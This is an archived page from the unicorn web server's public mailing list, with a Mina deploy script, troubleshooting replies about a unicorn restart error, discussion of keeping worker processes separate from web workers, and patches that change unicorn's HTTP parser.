set :shared_paths, ['config/database.yml', 'log']

# Optional settings:
#   set :user, 'foobar'    # Username in the server to SSH to.
#   set :port, '30000'     # SSH port number.
#   set :forward_agent, true     # SSH forward_agent.

# This task is the environment that is loaded for most commands, such as
# `mina deploy` or `mina rake`.
task :environment do
  # If you're using rbenv, use this to load the rbenv environment.
  # Be sure to commit your .rbenv-version to your repository.
  invoke :'rbenv:load'

  # For those using RVM, use this to load an RVM version@gemset.
  # invoke :'rvm:use[ruby-1.9.3-p125@default]'
end

# Put any custom mkdir's in here for when `mina setup` is ran.
# For Rails apps, we'll make some of the shared paths that are shared
between
# all releases.

task :setup => :environment do
  queue! %[mkdir -p "#{deploy_to}/shared/log"]
  queue! %[chmod g+rx,u+rwx "#{deploy_to}/shared/log"]

  queue! %[mkdir -p "#{deploy_to}/shared/config"]
  queue! %[chmod g+rx,u+rwx "#{deploy_to}/shared/config"]

  queue! %[mkdir -p "#{deploy_to}/shared/pids"]
  queue! %[chmod g+rx,u+rwx "#{deploy_to}/shared/pids"]

  queue! %[mkdir -p "#{deploy_to}/shared/sockets"]
  queue! %[chmod g+rx,u+rwx "#{deploy_to}/shared/sockets"]

  queue! %[touch "#{deploy_to}/shared/config/database.yml"]
  queue  %[echo "-----> Be sure to edit 'shared/config/database.yml'."]

  # sidekiq needs a place to store its pid file and log file
  queue! %[mkdir -p "#{deploy_to}/shared/pids/"]
  queue! %[chmod g+rx,u+rwx "#{deploy_to}/shared/pids"]
end

desc "Deploys the current version to the server."
task :deploy => :environment do
  deploy do

    # stop accepting new workers
    # TODO: Look into this later
    # invoke :'sidekiq:quiet'

    # Put things that will set up an empty directory into a fully set-up
    # instance of your project.
    invoke :'git:clone'
    invoke :'deploy:link_shared_paths'
    invoke :'bundle:install'
    invoke :'rails:db_migrate'
    invoke :'rails:assets_precompile'
    invoke :'deploy:cleanup'

    to :launch do
      # Passenger
      # queue "mkdir -p #{deploy_to}/#{current_path}/tmp/"
      # queue "touch #{deploy_to}/#{current_path}/tmp/restart.txt"

      # TODO: Look into this later
      # invoke :'sidekiq:restart'
      invoke :'unicorn:restart'
      #invoke :'unicorn:start'
      #queue "touch #{deploy_to}/tmp/restart.txt"

    end
  end
end

# For help in making your deploy script, see the Mina documentation:
#
#  - http://nadarei.co/mina
#  - http://nadarei.co/mina/tasks
#  - http://nadarei.co/mina/settings
#  - http://nadarei.co/mina/helpers

Please suggest what could be wrong.


Cheers!
Imdad Ali Khan
Mob (0) 9818484057
http://www.linkedin.com/in/imdad

On 24 October 2014 23:15, Eric Wong <e@80x24.org> wrote:

> Imdad <khanimdad@gmail.com> wrote:
> > I have rails4, nginx, unicorn and mona for app deployed
> > http://104.131.74.69/
> >
> > But after deploy hitting on above link results in error, and the log says
> >
> > root@Hailisys:~# tail -n 0 -f
> > /var/www/hailisys/shared/log/unicorn.stderr.log
> > I, [2014-10-24T17:28:53.162084 #15819]  INFO -- : executing
> > ["/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn",
> "-c",
> > "/var/www/hailisys/current/config/unicorn.rb", "-D", "-E", "production",
> > {11=>#<Kgio::UNIXServer:fd 11>}] (in /var/www/hailisys/releases/28)
>
> You're working inside /releases/28 here...
>
> >
> /var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:475:in
> > `exec': No such file or directory -
> > /var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn
> > (Errno::ENOENT)
>
> However, it's trying to run out of /releases/6, which I assume is
> old enough to be removed by now.
>
> You should be able to set working_directory in your config/unicorn.rb:
>
>         working_directory "/var/www/hailisys/current"
>
> Then SIGHUP to reload the config before sending SIGUSR2 to it.
>
> Hopefully that works.  Normally you shouldn't need to set
> working_directory if you're working out of "/current";
> but I'm not sure what your deploy environment looks like.
>


^ permalink raw reply	[relevance 1%]

* Re: Reserved workers not as webservers
  2014-10-09 17:14  0%   ` Devin Ben-Hur
@ 2014-10-09 18:29  0%     ` Bráulio Bhavamitra
  0 siblings, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2014-10-09 18:29 UTC (permalink / raw)
  To: Devin Ben-Hur; +Cc: Michael Fischer, unicorn-public

On Thu, Oct 9, 2014 at 2:14 PM, Devin Ben-Hur <dbenhur@whitepages.com> wrote:
> On 10/9/14, 9:45 AM, Michael Fischer wrote:
>>
>> On Thu, Oct 9, 2014 at 5:24 AM, Bráulio Bhavamitra <braulio@eita.org.br>
>> wrote:
>>
>> I'm quite amazed of how preloading and fork and reduce memory usage.
>>>
>>> Making it use even less memory and restarting the app faster, the next
>>> step would be incorporate other daemons (also part of the app, in my
>>> case delayed_job and feed-updater) AS unicorn workers.
>>
>>
>> As your friendly neighborhood service engineer, my experience is that
>> separating the concerns (keeping asynchronous processors separate from
>> your
>> synchronouous web services) is worth the additional memory and processor
>> cost.  The two usually don't scale at the same rate, and you want to keep
>> your failure domains separate as well: you don't want a bug in the async
>> processor cause your web server to crash as well.   And let's not even get
>> into the programming and maintenance challenges.
>
>
> Excellent points Michael.  But to Bráulio's original request, it would be
> lovely to factor out the clean and robust process management parts of
> unicorn (daemonization, pidfile-mgmt, pre-load, fork, reap, signaling)
> separate from the HTTP/Rack server.  This would give us a robust supervisor
> for asynchronous workers that reduce memory footprint with CoW and responds
> to a well understood set of signals for management.

That would be great! If unicorn's server except HTTP specific code
could be extracted into a separate gem it would be fantastic :)

^ permalink raw reply	[relevance 0%]

* Re: Reserved workers not as webservers
  2014-10-09 17:59  3%     ` Michael Fischer
@ 2014-10-09 18:01  0%       ` Bráulio Bhavamitra
  0 siblings, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2014-10-09 18:01 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Oh I see you are talking about the case you have many machines for a
web app. The ones I admin is one VPS for all services. :)

On Thu, Oct 9, 2014 at 2:59 PM, Michael Fischer <mfischer@zendesk.com> wrote:
> On Thu, Oct 9, 2014 at 10:43 AM, Bráulio Bhavamitra <braulio@eita.org.br>
> wrote:
>
>> As being forked process, I never saw a worker problem crashing master
>> or other workers.
>
>
> Process isolation is one thing, but that's not the same thing as system
> isolation.  Imagine your worker process has a memory leak and in response,
> the kernel's OOM killer decides to kill your webserver children.
>
> --Michael



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é
meu lar e todos nós somos cidadãos deste cosmo. Este universo é a
imaginação da Mente Macrocósmica, e todas as entidades estão sendo
criadas, preservadas e destruídas nas fases de extroversão e
introversão do fluxo imaginativo cósmico. No âmbito pessoal, quando
uma pessoa imagina algo em sua mente, naquele momento, essa pessoa é a
única proprietária daquilo que ela imagina, e ninguém mais. Quando um
ser humano criado mentalmente caminha por um milharal também
imaginado, a pessoa imaginada não é a propriedade desse milharal, pois
ele pertence ao indivíduo que o está imaginando. Este universo foi
criado na imaginação de Brahma, a Entidade Suprema, por isso a
propriedade deste universo é de Brahma, e não dos microcosmos que
também foram criados pela imaginação de Brahma. Nenhuma propriedade
deste mundo, mutável ou imutável, pertence a um indivíduo em
particular; tudo é o patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia

^ permalink raw reply	[relevance 0%]

* Re: Reserved workers not as webservers
  2014-10-09 17:43  0%   ` Bráulio Bhavamitra
@ 2014-10-09 17:59  3%     ` Michael Fischer
  2014-10-09 18:01  0%       ` Bráulio Bhavamitra
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2014-10-09 17:59 UTC (permalink / raw)
  To: Bráulio Bhavamitra; +Cc: unicorn-public

On Thu, Oct 9, 2014 at 10:43 AM, Bráulio Bhavamitra <braulio@eita.org.br>
wrote:

As being forked process, I never saw a worker problem crashing master
> or other workers.


Process isolation is one thing, but that's not the same thing as system
isolation.  Imagine your worker process has a memory leak and in response,
the kernel's OOM killer decides to kill your webserver children.

--Michael


^ permalink raw reply	[relevance 3%]

* Re: Reserved workers not as webservers
  2014-10-09 16:45  3% ` Michael Fischer
  2014-10-09 17:14  0%   ` Devin Ben-Hur
@ 2014-10-09 17:43  0%   ` Bráulio Bhavamitra
  2014-10-09 17:59  3%     ` Michael Fischer
  1 sibling, 1 reply; 200+ results
From: Bráulio Bhavamitra @ 2014-10-09 17:43 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Hello Michael,

As being forked process, I never saw a worker problem crashing master
or other workers.

Also, unicorn takes care to restart workers if they die, and that is
very useful for daemons to.

I agree with your scaling point, but that could be solved with
different unicorn configurations.

cheers,
bráulio

On Thu, Oct 9, 2014 at 1:45 PM, Michael Fischer <mfischer@zendesk.com> wrote:
> On Thu, Oct 9, 2014 at 5:24 AM, Bráulio Bhavamitra <braulio@eita.org.br>
> wrote:
>
>> I'm quite amazed of how preloading and fork and reduce memory usage.
>> Making it use even less memory and restarting the app faster, the next
>> step would be incorporate other daemons (also part of the app, in my
>> case delayed_job and feed-updater) AS unicorn workers.
>
>
> As your friendly neighborhood service engineer, my experience is that
> separating the concerns (keeping asynchronous processors separate from your
> synchronouous web services) is worth the additional memory and processor
> cost.  The two usually don't scale at the same rate, and you want to keep
> your failure domains separate as well: you don't want a bug in the async
> processor cause your web server to crash as well.   And let's not even get
> into the programming and maintenance challenges.
>
> There is such as thing as being too cheap. :)
>
> --Michael
>



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é
meu lar e todos nós somos cidadãos deste cosmo. Este universo é a
imaginação da Mente Macrocósmica, e todas as entidades estão sendo
criadas, preservadas e destruídas nas fases de extroversão e
introversão do fluxo imaginativo cósmico. No âmbito pessoal, quando
uma pessoa imagina algo em sua mente, naquele momento, essa pessoa é a
única proprietária daquilo que ela imagina, e ninguém mais. Quando um
ser humano criado mentalmente caminha por um milharal também
imaginado, a pessoa imaginada não é a propriedade desse milharal, pois
ele pertence ao indivíduo que o está imaginando. Este universo foi
criado na imaginação de Brahma, a Entidade Suprema, por isso a
propriedade deste universo é de Brahma, e não dos microcosmos que
também foram criados pela imaginação de Brahma. Nenhuma propriedade
deste mundo, mutável ou imutável, pertence a um indivíduo em
particular; tudo é o patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia

^ permalink raw reply	[relevance 0%]

* Re: Reserved workers not as webservers
  2014-10-09 16:45  3% ` Michael Fischer
@ 2014-10-09 17:14  0%   ` Devin Ben-Hur
  2014-10-09 18:29  0%     ` Bráulio Bhavamitra
  2014-10-09 17:43  0%   ` Bráulio Bhavamitra
  1 sibling, 1 reply; 200+ results
From: Devin Ben-Hur @ 2014-10-09 17:14 UTC (permalink / raw)
  To: Michael Fischer, Bráulio Bhavamitra; +Cc: unicorn-public

On 10/9/14, 9:45 AM, Michael Fischer wrote:
> On Thu, Oct 9, 2014 at 5:24 AM, Bráulio Bhavamitra <braulio@eita.org.br> wrote:
>
> I'm quite amazed of how preloading and fork and reduce memory usage.
>> Making it use even less memory and restarting the app faster, the next
>> step would be incorporate other daemons (also part of the app, in my
>> case delayed_job and feed-updater) AS unicorn workers.
>
> As your friendly neighborhood service engineer, my experience is that
> separating the concerns (keeping asynchronous processors separate from your
> synchronouous web services) is worth the additional memory and processor
> cost.  The two usually don't scale at the same rate, and you want to keep
> your failure domains separate as well: you don't want a bug in the async
> processor cause your web server to crash as well.   And let's not even get
> into the programming and maintenance challenges.

Excellent points Michael.  But to Bráulio's original request, it would 
be lovely to factor out the clean and robust process management parts of 
unicorn (daemonization, pidfile-mgmt, pre-load, fork, reap, signaling) 
separate from the HTTP/Rack server.  This would give us a robust 
supervisor for asynchronous workers that reduce memory footprint with 
CoW and responds to a well understood set of signals for management.

^ permalink raw reply	[relevance 0%]

* Re: Reserved workers not as webservers
  @ 2014-10-09 16:45  3% ` Michael Fischer
  2014-10-09 17:14  0%   ` Devin Ben-Hur
  2014-10-09 17:43  0%   ` Bráulio Bhavamitra
  0 siblings, 2 replies; 200+ results
From: Michael Fischer @ 2014-10-09 16:45 UTC (permalink / raw)
  To: Bráulio Bhavamitra; +Cc: unicorn-public

On Thu, Oct 9, 2014 at 5:24 AM, Bráulio Bhavamitra <braulio@eita.org.br>
wrote:

I'm quite amazed of how preloading and fork and reduce memory usage.
> Making it use even less memory and restarting the app faster, the next
> step would be incorporate other daemons (also part of the app, in my
> case delayed_job and feed-updater) AS unicorn workers.


As your friendly neighborhood service engineer, my experience is that
separating the concerns (keeping asynchronous processors separate from your
synchronouous web services) is worth the additional memory and processor
cost.  The two usually don't scale at the same rate, and you want to keep
your failure domains separate as well: you don't want a bug in the async
processor cause your web server to crash as well.   And let's not even get
into the programming and maintenance challenges.

There is such as thing as being too cheap. :)

--Michael


^ permalink raw reply	[relevance 3%]

* Re: Unicorn not working in GitLab 7.3
  2014-10-06 15:07  3% ` Onno van der Straaten
@ 2014-10-07  5:08  0%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-10-07  5:08 UTC (permalink / raw)
  To: Onno van der Straaten; +Cc: unicorn-public

Onno van der Straaten <onno.van.der.straaten@gmail.com> wrote:
> On Mon, Oct 6, 2014 at 5:04 PM, Onno van der Straaten wrote:

(Top-posting corrected.  Please do not send HTML email as it ends up
 marked as spam.  You would've gotten a response much earlier if you
 sent as plain text)

> > Hi,
> > I am using unicorn in GitLab 7.3. I found that unicorn will not serve
> > javascript files. There is no response. Other files such as css files work
> > fine.
> >
> > I have created an issue at the GitLab site as unicorn is part of his
> > product. For your information
> > https://github.com/gitlabhq/gitlabhq/issues/7973

This doesn't seems to be a configuration error or a bug in GitLab.
unicorn itself does not serve files, but just returns what Rack tells
it to do.

But since you're getting 60s timeouts, something seems seriously wrong
with that config; but at least you're on Linux so maybe strace can
help...

> This is unicorn 4.6.3 btw. On the other machine it is the same
> version 4.6.3. So maybe this issue is releated to using unicorn on CentOS.

Can you try:

1) configuring only single worker process
2) strace that worker process (strace -p $PID_OF_WORKER)
3) send only one request for a JS file to see what's happening?


In any case, if this GitLab instance is meant for any slow/unreliable
client connections outside your LAN, nginx should be serving static
files.  unicorn is grossly inefficient for that (as explained on our
website):

  http://unicorn.bogomips.org/PHILOSOPHY.html

^ permalink raw reply	[relevance 0%]

* Re: Unicorn not working in GitLab 7.3
  @ 2014-10-06 15:07  3% ` Onno van der Straaten
  2014-10-07  5:08  0%   ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Onno van der Straaten @ 2014-10-06 15:07 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 582 bytes --]

This is unicorn 4.6.3 btw. On the other machine it is the same
version 4.6.3. So maybe this issue is releated to using unicorn on CentOS.

On Mon, Oct 6, 2014 at 5:04 PM, Onno van der Straaten <
onno.van.der.straaten@gmail.com> wrote:

> Hi,
> I am using unicorn in GitLab 7.3. I found that unicorn will not serve
> javascript files. There is no response. Other files such as css files work
> fine.
>
> I have created an issue at the GitLab site as unicorn is part of his
> product. For your information
> https://github.com/gitlabhq/gitlabhq/issues/7973
> Best Regards,
> Onno
>
>

[-- Attachment #2: Type: message/external-body, Size: 84 bytes --]

^ permalink raw reply	[relevance 3%]

* Re: Master hooks needed
  @ 2014-10-03 18:12  3%       ` Valentin Mihov
  0 siblings, 0 replies; 200+ results
From: Valentin Mihov @ 2014-10-03 18:12 UTC (permalink / raw)
  To: Eric Wong; +Cc: Bráulio Bhavamitra, unicorn-public

On Fri, Oct 3, 2014 at 8:50 PM, Eric Wong <e@80x24.org> wrote:
> Valentin Mihov <valentin.mihov@gmail.com> wrote:
>> On Fri, Oct 3, 2014 at 3:22 PM, Eric Wong <e@80x24.org> wrote:
>> > Bráulio Bhavamitra <braulio@eita.org.br> wrote:
>> > > Both operations I currently do (server warm up and old pid kill) need
>> > > to be run only once, and not for every worker as before_fork does,
>> > > that's why I had to put the condition seen above.
>> >
>> > rack.git also has a Rack::Builder#warmup method.  Aman originally
>> > proposed it for unicorn, but it's useful outside of unicorn so
>> > we moved it to Rack.
>>
>> Isn't it much better to do the warmup in an initializer instead in
>> unicorn? This way you can preload_app=true and the master will execute
>> the warmup code and fork. Killing the old pid is probably stopping you
>> from do that, right?
>
> Right, that's exactly what Rack::Builder#warmup does with
> preload_app=true.  If by "initializer" you mean within the application,
> the problem was it lacked the visibility of the entire Rack middleware
> stack which Rack::Builder has.
>
> ref:
> http://bogomips.org/unicorn-public/m/571f2d6c6f4b8df644bd84f069fafa5bde3cde2e
> http://bogomips.org/unicorn-public/m/20130923105807.GA24712%40dcvr.yhbt.net

I was thinking about a Rails initializer, but what you pointed to is a
generalization of that. So, we are talking about the same thing.

^ permalink raw reply	[relevance 3%]

* [PATCH 4/4] http: reduce parser from 72 to 56 bytes on 64-bit
    2014-09-22  1:05 10% ` [PATCH 2/4] remove mongrel.rubyforge.org references Eric Wong
  2014-09-22  1:05 10% ` [PATCH 3/4] http: remove the keepalive requests limit Eric Wong
@ 2014-09-22  1:05 12% ` Eric Wong
  2 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-09-22  1:05 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

This allows the parser struct to fit in one cache line on
x86-64 systems where cache lines are 64 bytes.

Using 32-bit integer lengths is safe here because these are only for
tracking offsets within the HTTP header buffer.  We can safely limit
HTTP headers and in-memory buffers to be less than 4GB without
anybody complaining.

HTTP bodies continue to use off_t (usually 64-bit, even on 32-bit
systems) sizes and support as much as the OS/hardware can handle.
---
 ext/unicorn_http/unicorn_http.rl | 18 +++++++++---------
 test/unit/test_http_parser_ng.rb |  6 ++++++
 2 files changed, 15 insertions(+), 9 deletions(-)

diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index 9372d39..3294357 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -29,27 +29,27 @@ void init_unicorn_httpdate(void);
 /* all of these flags need to be set for keepalive to be supported */
 #define UH_FL_KEEPALIVE (UH_FL_KAVERSION | UH_FL_REQEOF | UH_FL_HASHEADER)
 
-static size_t MAX_HEADER_LEN = 1024 * (80 + 32); /* same as Mongrel */
+static unsigned int MAX_HEADER_LEN = 1024 * (80 + 32); /* same as Mongrel */
 
 /* this is only intended for use with Rainbows! */
 static VALUE set_maxhdrlen(VALUE self, VALUE len)
 {
-  return SIZET2NUM(MAX_HEADER_LEN = NUM2SIZET(len));
+  return UINT2NUM(MAX_HEADER_LEN = NUM2UINT(len));
 }
 
 /* keep this small for Rainbows! since every client has one */
 struct http_parser {
   int cs; /* Ragel internal state */
   unsigned int flags;
-  size_t mark;
-  size_t offset;
+  unsigned int mark;
+  unsigned int offset;
   union { /* these 2 fields don't nest */
-    size_t field;
-    size_t query;
+    unsigned int field;
+    unsigned int query;
   } start;
   union {
-    size_t field_len; /* only used during header processing */
-    size_t dest_offset; /* only used during body processing */
+    unsigned int field_len; /* only used during header processing */
+    unsigned int dest_offset; /* only used during body processing */
   } s;
   VALUE buf;
   VALUE env;
@@ -74,7 +74,7 @@ static void parser_raise(VALUE klass, const char *msg)
 }
 
 #define REMAINING (unsigned long)(pe - p)
-#define LEN(AT, FPC) (FPC - buffer - hp->AT)
+#define LEN(AT, FPC) (FPC - buffer - (unsigned long)hp->AT)
 #define MARK(M,FPC) (hp->M = (FPC) - buffer)
 #define PTR_TO(F) (buffer + hp->F)
 #define STR_NEW(M,FPC) rb_str_new(PTR_TO(M), LEN(M, FPC))
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index 9167845..d5c8d2e 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -11,6 +11,12 @@ class HttpParserNgTest < Test::Unit::TestCase
     @parser = HttpParser.new
   end
 
+  def test_parser_max_len
+    assert_raises(RangeError) do
+      HttpParser.max_header_len = 0xffffffff + 1
+    end
+  end
+
   def test_next_clear
     r = "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
     @parser.buf << r
-- 
EW


^ permalink raw reply related	[relevance 12%]

* [PATCH 3/4] http: remove the keepalive requests limit
    2014-09-22  1:05 10% ` [PATCH 2/4] remove mongrel.rubyforge.org references Eric Wong
@ 2014-09-22  1:05 10% ` Eric Wong
  2014-09-22  1:05 12% ` [PATCH 4/4] http: reduce parser from 72 to 56 bytes on 64-bit Eric Wong
  2 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-09-22  1:05 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

This was a hack for some event loops such as those found in nginx
and some Rainbows! concurrency models.  Using epoll/kqueue with
one-shot notification (which yahns does) avoids all fairness
problems.
---
 ext/unicorn_http/unicorn_http.rl | 37 ++------------------
 test/unit/test_http_parser_ng.rb | 74 +---------------------------------------
 2 files changed, 3 insertions(+), 108 deletions(-)

diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index ecdadb0..9372d39 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -29,29 +29,6 @@ void init_unicorn_httpdate(void);
 /* all of these flags need to be set for keepalive to be supported */
 #define UH_FL_KEEPALIVE (UH_FL_KAVERSION | UH_FL_REQEOF | UH_FL_HASHEADER)
 
-static unsigned long keepalive_requests = 100; /* same as nginx */
-
-/*
- * Returns the maximum number of keepalive requests a client may make
- * before the parser refuses to continue.
- */
-static VALUE ka_req(VALUE self)
-{
-  return ULONG2NUM(keepalive_requests);
-}
-
-/*
- * Sets the maximum number of keepalive requests a client may make.
- * A special value of +nil+ causes this to be the maximum value
- * possible (this is architecture-dependent).
- */
-static VALUE set_ka_req(VALUE self, VALUE val)
-{
-  keepalive_requests = NIL_P(val) ? ULONG_MAX : NUM2ULONG(val);
-
-  return ka_req(self);
-}
-
 static size_t MAX_HEADER_LEN = 1024 * (80 + 32); /* same as Mongrel */
 
 /* this is only intended for use with Rainbows! */
@@ -64,7 +41,6 @@ static VALUE set_maxhdrlen(VALUE self, VALUE len)
 struct http_parser {
   int cs; /* Ragel internal state */
   unsigned int flags;
-  unsigned long nr_requests;
   size_t mark;
   size_t offset;
   union { /* these 2 fields don't nest */
@@ -580,7 +556,6 @@ static VALUE HttpParser_init(VALUE self)
   http_parser_init(hp);
   hp->buf = rb_str_new(NULL, 0);
   hp->env = rb_hash_new();
-  hp->nr_requests = keepalive_requests;
 
   return self;
 }
@@ -814,15 +789,13 @@ static VALUE HttpParser_keepalive(VALUE self)
  *    parser.next? => true or false
  *
  * Exactly like HttpParser#keepalive?, except it will reset the internal
- * parser state on next parse if it returns true.  It will also respect
- * the maximum *keepalive_requests* value and return false if that is
- * reached.
+ * parser state on next parse if it returns true.
  */
 static VALUE HttpParser_next(VALUE self)
 {
   struct http_parser *hp = data_get(self);
 
-  if ((HP_FL_ALL(hp, KEEPALIVE)) && (hp->nr_requests-- != 0)) {
+  if (HP_FL_ALL(hp, KEEPALIVE)) {
     HP_FL_SET(hp, TO_CLEAR);
     return Qtrue;
   }
@@ -984,12 +957,6 @@ void Init_unicorn_http(void)
    */
   rb_define_const(cHttpParser, "LENGTH_MAX", OFFT2NUM(UH_OFF_T_MAX));
 
-  /* default value for keepalive_requests */
-  rb_define_const(cHttpParser, "KEEPALIVE_REQUESTS_DEFAULT",
-                  ULONG2NUM(keepalive_requests));
-
-  rb_define_singleton_method(cHttpParser, "keepalive_requests", ka_req, 0);
-  rb_define_singleton_method(cHttpParser, "keepalive_requests=", set_ka_req, 1);
   rb_define_singleton_method(cHttpParser, "max_header_len=", set_maxhdrlen, 1);
 
   init_common_fields();
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index ab335ac..9167845 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -8,7 +8,6 @@ include Unicorn
 class HttpParserNgTest < Test::Unit::TestCase
 
   def setup
-    HttpParser.keepalive_requests = HttpParser::KEEPALIVE_REQUESTS_DEFAULT
     @parser = HttpParser.new
   end
 
@@ -29,25 +28,6 @@ class HttpParserNgTest < Test::Unit::TestCase
     assert_equal false, @parser.response_start_sent
   end
 
-  def test_keepalive_requests_default_constant
-    assert_kind_of Integer, HttpParser::KEEPALIVE_REQUESTS_DEFAULT
-    assert HttpParser::KEEPALIVE_REQUESTS_DEFAULT >= 0
-  end
-
-  def test_keepalive_requests_setting
-    HttpParser.keepalive_requests = 0
-    assert_equal 0, HttpParser.keepalive_requests
-    HttpParser.keepalive_requests = nil
-    assert HttpParser.keepalive_requests >= 0xffffffff
-    HttpParser.keepalive_requests = 1
-    assert_equal 1, HttpParser.keepalive_requests
-    HttpParser.keepalive_requests = 666
-    assert_equal 666, HttpParser.keepalive_requests
-
-    assert_raises(TypeError) { HttpParser.keepalive_requests = "666" }
-    assert_raises(TypeError) { HttpParser.keepalive_requests = [] }
-  end
-
   def test_connection_TE
     @parser.buf << "GET / HTTP/1.1\r\nHost: example.com\r\nConnection: TE\r\n"
     @parser.buf << "TE: trailers\r\n\r\n"
@@ -71,41 +51,11 @@ class HttpParserNgTest < Test::Unit::TestCase
       "REQUEST_METHOD" => "GET",
       "QUERY_STRING" => ""
     }.freeze
-    HttpParser::KEEPALIVE_REQUESTS_DEFAULT.times do |nr|
-      @parser.buf << req
-      assert_equal expect, @parser.parse
-      assert @parser.next?
-    end
-    @parser.buf << req
-    assert_equal expect, @parser.parse
-    assert ! @parser.next?
-  end
-
-  def test_fewer_keepalive_requests_with_next?
-    HttpParser.keepalive_requests = 5
-    @parser = HttpParser.new
-    req = "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n".freeze
-    expect = {
-      "SERVER_NAME" => "example.com",
-      "HTTP_HOST" => "example.com",
-      "rack.url_scheme" => "http",
-      "REQUEST_PATH" => "/",
-      "SERVER_PROTOCOL" => "HTTP/1.1",
-      "PATH_INFO" => "/",
-      "HTTP_VERSION" => "HTTP/1.1",
-      "REQUEST_URI" => "/",
-      "SERVER_PORT" => "80",
-      "REQUEST_METHOD" => "GET",
-      "QUERY_STRING" => ""
-    }.freeze
-    5.times do |nr|
+    100.times do |nr|
       @parser.buf << req
       assert_equal expect, @parser.parse
       assert @parser.next?
     end
-    @parser.buf << req
-    assert_equal expect, @parser.parse
-    assert ! @parser.next?
   end
 
   def test_default_keepalive_is_off
@@ -664,28 +614,6 @@ class HttpParserNgTest < Test::Unit::TestCase
     assert_equal "", @parser.buf
   end
 
-  def test_keepalive_requests_disabled
-    req = "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n".freeze
-    expect = {
-      "SERVER_NAME" => "example.com",
-      "HTTP_HOST" => "example.com",
-      "rack.url_scheme" => "http",
-      "REQUEST_PATH" => "/",
-      "SERVER_PROTOCOL" => "HTTP/1.1",
-      "PATH_INFO" => "/",
-      "HTTP_VERSION" => "HTTP/1.1",
-      "REQUEST_URI" => "/",
-      "SERVER_PORT" => "80",
-      "REQUEST_METHOD" => "GET",
-      "QUERY_STRING" => ""
-    }.freeze
-    HttpParser.keepalive_requests = 0
-    @parser = HttpParser.new
-    @parser.buf << req
-    assert_equal expect, @parser.parse
-    assert ! @parser.next?
-  end
-
   def test_chunk_only
     tmp = ""
     assert_equal @parser, @parser.dechunk!
-- 
EW


^ permalink raw reply related	[relevance 10%]

* [PATCH 2/4] remove mongrel.rubyforge.org references
  @ 2014-09-22  1:05 10% ` Eric Wong
  2014-09-22  1:05 10% ` [PATCH 3/4] http: remove the keepalive requests limit Eric Wong
  2014-09-22  1:05 12% ` [PATCH 4/4] http: reduce parser from 72 to 56 bytes on 64-bit Eric Wong
  2 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-09-22  1:05 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

mongrel.rubyforge.org has been dead longer than rubyforge.org!
---
 test/test_helper.rb           | 4 ++--
 test/unit/test_http_parser.rb | 4 ++--
 test/unit/test_response.rb    | 4 ++--
 test/unit/test_server.rb      | 4 ++--
 4 files changed, 8 insertions(+), 8 deletions(-)

diff --git a/test/test_helper.rb b/test/test_helper.rb
index c65f2f3..c4fe07a 100644
--- a/test/test_helper.rb
+++ b/test/test_helper.rb
@@ -1,10 +1,10 @@
 # -*- encoding: binary -*-
 
-# Copyright (c) 2005 Zed A. Shaw 
+# Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
 # the GPLv2+ (GPLv3+ preferred)
 #
-# Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html 
+# Additional work donated by contributors.  See git history
 # for more information.
 
 STDIN.sync = STDOUT.sync = STDERR.sync = true # buffering makes debugging hard
diff --git a/test/unit/test_http_parser.rb b/test/unit/test_http_parser.rb
index 8d5b251..2251dcf 100644
--- a/test/unit/test_http_parser.rb
+++ b/test/unit/test_http_parser.rb
@@ -1,10 +1,10 @@
 # -*- encoding: binary -*-
 
-# Copyright (c) 2005 Zed A. Shaw 
+# Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
 # the GPLv2+ (GPLv3+ preferred)
 #
-# Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html
